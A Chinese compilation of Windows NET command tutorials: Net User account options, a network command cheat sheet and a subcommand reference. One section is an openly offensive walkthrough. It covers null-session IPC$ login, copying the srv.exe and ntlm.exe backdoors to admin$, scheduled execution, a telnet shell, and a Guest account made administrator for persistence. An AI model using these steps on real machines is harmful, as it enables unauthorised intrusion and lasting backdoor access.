NET命令

NET命令的另类用法

在一次帮助用户维护网络的时候，偶然发现Windows XP操作系统中的NET系列命令中多了一个Net User命令。经过仔细推敲和演练发现Net User不仅可以用来添加或修改用户或者显示用户信息，还可以对用户设置不同的限制，比控制面板中的“用户账户”的应用效果要好多了，大家不妨试试。

　　Net User命令是一个DOS命令，必须在Windows XP下的MS-DOS模式下运行，所以首先要进入MS-DOS模式：选择“开始”菜单的“附件”选项的子选项“命令提示符”，或在“开始”菜单的“运行”选项（快捷键为Win+R）中输入“cmd.exe”，进入MS-DOS模式。以下功能都基于此模式下。

　　建立一个普通新用户

　　在MS-DOS提示符中输入如下命令：“net user john 123 /add”，回车。即可新建一个名为“John”，密码为“123”的新用户。Add参数表示新建用户。

　　值得注意的是：用户名最多可有 20 个字符，密码最多可有 127 个字符。

　　建立一个登录时间受限制的用户

　　用以下方法可实现对电脑使用时间的控制。比如，需要建立一个John的用户账号，密码为“123”，登录权限从星期一到星期五的早上八点到晚上十点和双休日的晚上七点到晚上九点。

　　1. 12小时制可键入如下命令：“net user john 123 /add /times:monday-friday,8AM-10PM;saturday-sunday,7PM-9PM”，回车确定即可。

　　2. 24小时制可键入如下命令：“net user john 123 /add /times:M-F,8:00-22:00;Sa-Su,19:00-21:00”，回车确定即可。

　　值得注意的是：Time的增加值限制为1小时。对于Day值，可以用全称或缩写（即 M、T、W、Th、F、Sa、Su）。可以使用12小时或24小时时间表示法。对于12小时表示法，请使用AM、PM或A.M.、P.M.。All值表示用户始终可以登录；空值（空白）意味着用户永远不能登录。用逗号分隔日期和时间，用分号分隔日期和时间单元（例如，M,4AM-5PM;T,1PM-3PM）。指定时间时不要使用空格。

　　另外，Passwordchg:{yes | no}参数可用来指定用户是否可以更改自己的密码，默认设置为 Yes。

限定用户的使用时间

　　Net User命令还可以使用参数Expires:{{mm/dd/yyyy | dd/mm/yyyy | mmm,dd ,yyyy} | never} 使用户账号根据指定的Date过期限定用户。过期日期可以是 [mm/dd/yyyy]、[dd/mm/yyyy] 或[mmm,dd,yyyy]格式。它取决于国家（地区）代码。用户账号在指定日期开始时到期。对于月份值，可以使用数字、全称或三个字母的缩写（即Jan、Feb、Mar、Apr、May、Jun、Jul、Aug、Sep、Oct、Nov、Dec）。对于年份值，可以使用两位数或四位数；使用逗号和斜杠分隔日期的各部分；不要使用空格。

　　例如：要限定用户账号John到2004年11月5日到期，可键入如下命令：“net user john /expires:Nov/5/2004”，回车确定即可。


　　查看用户信息、修改已有用户密码和删除用户


　　如果在没有参数的情况下使用，则Net User将显示计算机上用户的列表，如键入以下命令：“net user”，回车即可显示该系统的所有用户。

　　如果键入：“net user john”，回车则可显示用户John的信息。

　　若键入命令：“net user john 123456 /add”，回车确定，则强制将用户John（John为已有用户）的密码更改为123456。

　　若键入命令：“net user john /delete”，回车确定则可删除用户John。

　　关于Net User命令的用法就介绍这么多，其实像这样的技巧很多，需要大家不断探索，相互交流。


转自： [url]www.pconline.com.cn[/url]

 

 

NET命令

                                      

1 . C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。
　　
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
　　
3. C:\>net time \\127.0.0.1
查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。
　　
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）
　　
5. C:\>net time \\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。
　　
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
　　
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
　　
8. C:\WINNT\system32>ntlm
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次
访问这台计算机)
网络经典命令

1.最基本，最常用的，测试物理网络的
ping 192.168.10.88 －t ，参数－t是等待用户去中断测试

2.查看DNS、IP、Mac等
A.Win98：winipcfg
B.Win2000以上：Ipconfig/all

C.NSLOOKUP：如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68

Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212

3.网络信使
Net send 计算机名/IP|* (广播) 传送内容，注意不能跨网段
net stop messenger 停止信使服务，也可以在面板－服务修改
net start messenger 开始信使服务

4.探测对方对方计算机名，所在的组、域及当前用户名
ping －a IP －t ，只显示NetBios名
nbtstat -a 192.168.10.146 比较全的

5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等

6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址
arp -a

7.在代理服务器端
捆绑IP和MAC地址，解决局域网内盗用IP：
ARP －s 192.168.10.59 00－50－ff－6c－08－75
解除网卡的IP与MAC地址的绑定：
arp -d 网卡IP

8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启

9.几个net命令
A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。
比如：查看这个IP上的共享资源，就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。

B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如：net use z: \??.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘

D.记录链接 net session
例如：
C:\>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\??.168.10.110 ROME Windows 2000 2195 0 00:03:12

\??.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。

10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的％

11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享：
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。

12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address

Windows系统Net命令使用技巧

大家在操作Windows 9X/NT/2000/XP/2003系统的过程中，都会或多或少会遇到这样或那样的问题；特别是网管员在维护单位的局域网或广域网时候，如果能掌握一些Windows 系统的网络命令使用技巧，常常会给工作带来极大的方便，有时能起到事倍功半的效果；本文就Net 网络命令在实际操作中使用技巧，供大家参考。

本 文 主 要 内 容	NET View	NET User	NET Use	NET Time	Net Start
	Net Pause	Net Continue	NET Stop	Net Statistics	Net Share
	Net Session	Net Send	Net Print	Net Name	Net Localgroup
	Net Group	Net File	Net Config	Net Computer	Net Accounts

　

我们知道NET命令是一个命令行命令，Net 命令有很多函数用于实用和核查计算机之间的NetBIOS连接，可以查看我们的管理网络环境、服务、用户、登陆等信息内容；要想获得Net 的HELP可以(1)在Windows下可以用图形的方式，开始->帮助->索引->输入NET；(2)在COMMAND下可以用字符方式：NET /?或NET或NET HELP取得相应的方法的帮助。所有Net命令接受选项/yes和/no(可缩写为/y和/n)。

　　下面对NET命令的不同参数的使用技巧介绍如下：

　　1、Net ViewI

　　作 用：显示域列表、计算机列表或指定计算机的共享资源列表。

　　命令格式：Net view [\\computername | /domain[:domainname]]

　　有关参数说明：

　　・键入不带参数的Net view显示当前域的计算机列表

　　・\\computername 指定要查看其共享资源的计算机

　　・/domain[:domainname]指定要查看其可用计算机的域

　　例如：Net view \\GHQ查看GHQ计算机的共享资源列表。

　　　　　Net view /domain:XYZ 查看XYZ域中的机器列表。

　　2、Net User

　　作 用：添加或更改用户帐号或显示用户帐号信息。

　　命令格式：Net user [username [password | *] [options]] [/domain]

　　有关参数说明：

　　・键入不带参数的Net user查看计算机上的用户帐号列表

　　・username添加、删除、更改或查看用户帐号名

　　・password为用户帐号分配或更改密码

　　・提示输入密码

　　・/domain在计算机主域的主域控制器中执行操作。该参数仅在 Windows NT Server 域成员的 Windows NT Workstation 计算机上可用。默认情况下，Windows NT Server 计算机在主域控制器中执行操作。注意：在计算机主域的主域控制器发生该动作。它可能不是登录域。

　　例如：Net user ghq123查看用户GHQ123的信息。

3、Net Use

　　作 用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

　　命令格式：Net use [devicename | *] [\\computername\sharename[\volume]] [password|*]][/user:[domainname\]username][[/delete]| [/persistent:{yes | no}]]

　　有关参数说明：

　　・键入不带参数的Net use列出网络连接

　　・devicename指定要连接到的资源名称或要断开的设备名称

　　・\\computername\sharename服务器及共享资源的名称

　　・password访问共享资源的密码

　　・*提示键入密码

　　・/user指定进行连接的另外一个用户

　　・domainname指定另一个域

　　・username指定登录的用户名

　　・/home将用户连接到其宿主目录

　　・/delete取消指定网络连接

　　・/persistent控制永久网络连接的使用。

　　例如：Net use f: \\GHQ\TEMP 将 \\GHQ\TEMP目录建立为F盘

　　　　　Net use f: \GHQ\TEMP /delete 断开连接。

　　4、Net Time

　　作 用：使计算机的时钟与另一台计算机或域的时间同步。

　　命令格式：Net time [\\computername | /domain[:name]] [/set]

　　有关参数说明：

　　・\\computername要检查或同步的服务器名

　　・/domain[:name]指定要与其时间同步的域

　　・/set使本计算机时钟与指定计算机或域的时钟同步。

　　5、Net Start

　　作 用：启动服务，或显示已启动服务的列表。

　　命令格式：Net start service

　　6、Net Pause

　　作 用：暂停正在运行的服务。

　　命令格式：Net pause service

　　7、Net Continue

　　作 用：重新激活挂起的服务。

　　命令格式：Net continue service 　　

　　8、Net Stop

　　作 用：停止 Windows NT/2000/2003 网络服务。

　　命令格式：Net stop service

　　下面我们来看看上面四条命令里服务包含哪些服务：

 

　　(1)alerter(警报)；

　　(2)client service for Netware(Netware 客户端服务)

　　(3)clipbook server(剪贴簿服务器)

　　(4)computer browser(计算机浏览器)

　　(5)directory replicator(目录复制器)

　　(6)ftp publishing service (ftp )(ftp 发行服务)

　　(7)lpdsvc

　　(8)Net logon(网络登录)

　　(9)Network dde(网络 dde)

　　(10)Network dde dsdm(网络 dde dsdm)

　　(11)Network monitor agent(网络监控代理)

　　(12)ole(对象链接与嵌入)

　　(13)remote access connection manager(远程访问连接管理器)

　　(14)remote access isnsap service(远程访问 isnsap 服务)

　　(15)remote access server(远程访问服务器)

　　(16)remote procedure call (rpc) locator(远程过程调用定位器)

　　(17)remote procedure call (rpc) service(远程过程调用服务)

　　(18)schedule(调度)

　　(19)server(服务器)

　　(20)simple tcp/ip services(简单 TCP/IP 服务)

　　(21)snmp

　　(22)spooler(后台打印程序)

　　(23)tcp/ip Netbios helper(TCP/IP NETBIOS 辅助工具)

　　(24)ups

　　(25)workstation(工作站)

　　(26)messenger(信使)

　　(27)dhcp client 

9、Net Statistics

　　作 用：显示本地工作站或服务器服务的统计记录。

　　命令格式：Net statistics [workstation | server]

　　有关参数说明：

　　・键入不带参数的Net statistics列出其统计信息可用的运行服务

　　・workstation显示本地工作站服务的统计信息

　　・server显示本地服务器服务的统计信息

　　例如：Net statistics server | more显示服务器服务的统计信息。

　　10、Net Share

　　作 用：创建、删除或显示共享资源。

　　命令格式：Net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]

　　有关参数说明：

　　・ 键入不带参数的Net share显示本地计算机上所有共享资源的信息

　　・ sharename是共享资源的网络名称

　　・ drive:path指定共享目录的绝对路径

　　・ /users:number设置可同时访问共享资源的最大用户数

　　・ /unlimited不限制同时访问共享资源的用户数

　　・ /remark:"text "添加关于资源的注释，注释文字用引号引住

　　例如： Net share yesky=c:\temp /remark:"my first share"

　　以yesky为共享名共享C:\temp

　　Net share yesky /delete停止共享yesky目录

　　11、Net Session

　　作 用：列出或断开本地计算机和与之连接的客户端的会话。

　　命令格式：Net session [\\computername] [/delete]

　　有关参数说明：

　　・键入不带参数的Net session显示所有与本地计算机的会话的信息。

　　・\\computername标识要列出或断开会话的计算机。

　　・/delete结束与 \computername 计算机会话并关闭本次会话期间计算机的所有打开文件。如果省略\computername 参数，将取消与本地计算机的所有会话。

　　例如：Net session \\GHQ要显示计算机名为GHQ的客户端会话信息列表。

　　12、Net Send

　　作 用：向网络的其他用户、计算机或通信名发送消息。

　　命令格式：Net send {name | * | /domain[:name] | /users} message

　　有关参数说明：

　　・name要接收发送消息的用户名、计算机名或通信名

　　・* 将消息发送到组中所有名称

　　・/domain[:name]将消息发送到计算机域中的所有名称

　　・/users将消息发送到与服务器连接的所有用户

　　・message作为消息发送的文本

　　例如：Net send /users server will shutdown in 10 minutes.给所有连接到服务器的用户发送消息。

　　13、Net Print

　　作 用：显示或控制打印作业及打印队列。

　　命令格式：Net print [\\computername ] job# [/hold | /release | /delete]

　　有关参数说明：

　　・computername共享打印机队列的计算机名

　　・sharename打印队列名称

　　・job#在打印机队列中分配给打印作业的标识号

　　・/hold使用 job# 时，在打印机队列中使打印作业等待

　　・/release释放保留的打印作业

　　・/delete从打印机队列中删除打印作业

　　例如：Net print \\GHQ\HP8000列出\\GHQ计算机上HP8000打印机队列的目录。

14、Net Name

　　作 用：添加或删除消息名（有时也称别名），或显示计算机接收消息的名称列表。

　　命令格式：Net name [name [/add | /delete]]

　　有关参数说明：

　　・键入不带参数的Net name列出当前使用的名称

　　・name指定接收消息的名称

　　・/add将名称添加到计算机中

　　・/delete从计算机中删除名称

　　15、Net Localgroup

　　作 用：添加、显示或更改本地组。

　　命令格式：Net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]

　　有关参数说明：

 

　　・键入不带参数的Net localgroup显示服务器名称和计算机的本地组名称

　　・groupname要添加、扩充或删除的本地组名称

　　・/comment: "text "为新建或现有组添加注释

　　・/domain在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作

　　・name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名

　　・/add将全局组名或用户名添加到本地组中

　　・/delete从本地组中删除组名或用户名

　　例如：Net localgroup ggg /add 将名为ggg的本地组添加到本地用户帐号数据库；

　　Net localgroup ggg 显示ggg本地组中的用户。

　　16、Net Group

　　作 用：在 Windows NT/2000/2003 Server 域中添加、显示或更改全局组。

　　命令格式：Net group groupname {/add [/comment:"text "] | /delete} [/domain]

　　有关参数说明：

　　・键入不带参数的Net group显示服务器名称及服务器的组名称

　　・groupname要添加、扩展或删除的组

　　・/comment:"text "为新建组或现有组添加注释

　　・/domain在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作

　　・username[ ...]列表显示要添加到组或从组中删除的一个或多个用户

　　・/add添加组或在组中添加用户名

　　・/delete删除组或从组中删除用户名

　　例如：Net group ggg GHQ1 GHQ2 /add将现有用户帐号GHQ1和GHQ2添加到本地计算机的ggg组。

　　17、Net File

　　作 用：显示某服务器上所有打开的共享文件名及锁定文件数。

　　命令格式：Net file [id [/close]]

　　有关参数说明：

　　・键入不带参数的Net file获得服务器上打开文件的列表

　　・id文件标识号

　　・/close关闭打开的文件并释放锁定记录

　　18、Net Config

　　作 用：显示当前运行的可配置服务，或显示并更改某项服务的设置。

　　命令格式：Net config [service [options]]

　　有关参数说明：

　　・键入不带参数的Net config显示可配置服务的列表

　　・service通过Net config命令进行配置的服务(server或workstation)

　　・options服务的特定选项

　　19、Net Computer

　　作 用：从域数据库中添加或删除计算机。

　　命令格式：Net computer \\computername {/add | /del}

　　有关参数说明：

　　・\\computername指定要添加到域或从域中删除的计算机

　　・/add将指定计算机添加到域

　　・/del将指定计算机从域中删除

　　例如：Net computer \\js /add将计算机js 添加到登录域。

20、Net Accounts

　　作 用：更新用户帐号数据库、更改密码及所有帐号的登录要求。

　　命令格式：Net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]

　　有关参数说明：

　　・键入不带参数的Net accounts显示当前密码设置、登录时限及域信息

　　・/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时

　　・/minpwlen:length设置用户帐号密码的最少字符数

　　・/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数

　　・/minpwage:days设置用户必须保持原密码的最小天数

　　・/uniquepw:number要求用户更改密码时，必须在经过number次后才能重复使用与之相同的密码

　　・/domain在当前域的主域控制器上执行该操作

　　・/sync当用于主域控制器时，该命令使域中所有备份域控制器同步

　　例如：Net accounts /minpwlen:8 将用户帐号密码的最少字符数设置为8。

　　当然Net命令具体在Win98/NT/2000/XP/2003环境中使用，可能会存在一些差异，请大家参考有关的资料说明，在此就不多说了。

　　下面是一个将Net、ping 和ipconfig 命令组合起来使用，测试局域网的连通性，判定远程计算机Microsoft 网络服务的文件和打印机有无共享的实际例子。仅供同志们在学习操作Net网络命令做参考，具体步骤如下：

　　1）首先我们要使用 Ping 命令测试 TCP/IP 的连接性，然后用 ipconfig 命令的显示，以确保网卡不处于“媒体已断开”状态。

　　2）打开DOS命令提示符，然后使用IP地址对所需主机进行 Ping 命令测试。

　　如果 Ping 命令失败，出现“Request timed out”消息，请验证主机 IP 地址是否正确，主机是否运行，以及该计算机和主机之间的所有网关（路由器）是否运行。

　　3）要使用 Ping 命令测试主机名称解析功能，请使用主机名称 ping 所需的主机。

如果 Ping 命令失败，出现“Unable to resolve target system name”消息，请验证主机名称是否正确，以及主机名称是否能被 DNS 服务器解析。

　　4）要使用Net view 命令测试 TCP/IP 连接，请打开命令提示符，然后键入 Net view\\计算机名称。Net view 命令将通过建立临时连接，列出使用 Windows XP/NT/2000/2003 的计算机上的文件和打印共享。如果在指定的计算机上没有文件或打印共享， Net view 命令将显示“There are no entries in the list”消息。

如果 Net view 命令失败，出现“System error 53 has occurred”消息，请验证计算机名称是否正确，使用 Windows XP/NT/2000/2003 的计算机是否运行，以及该计算机和使用 Windows XP/NT/2000/2003 的计算机之间的所有网关（路由器）是否运行。

　　如果Net view 命令失败，出现“System error 5 has occurred.Access is denied.”消息，请验证您登录所用的帐户是否具有查看远程计算机上共享的权限。

　　要进一步解决连通性问题，请执行以下操作：

　　a)使用 Ping 命令 ping 计算机名称。

　　如果 Ping 命令失败，出现“Unable to resolve target system name”消息，则计算机名称无法解析为 IP 地址。

　　b)使用Net view 命令和运行 Windows XP/NT/2000/2003 的计算机的 IP 地址，如下所示：

　　Net view \\IP 地址；如果Net view 命令成功，那么计算机名称 解析成错误的 IP 地址。

　　如果Net view 命令失败，出现“System error 53 has occurred”消息，则说明远程计算机可能没有运行 Microsoft 网络服务的文件和打印机共享。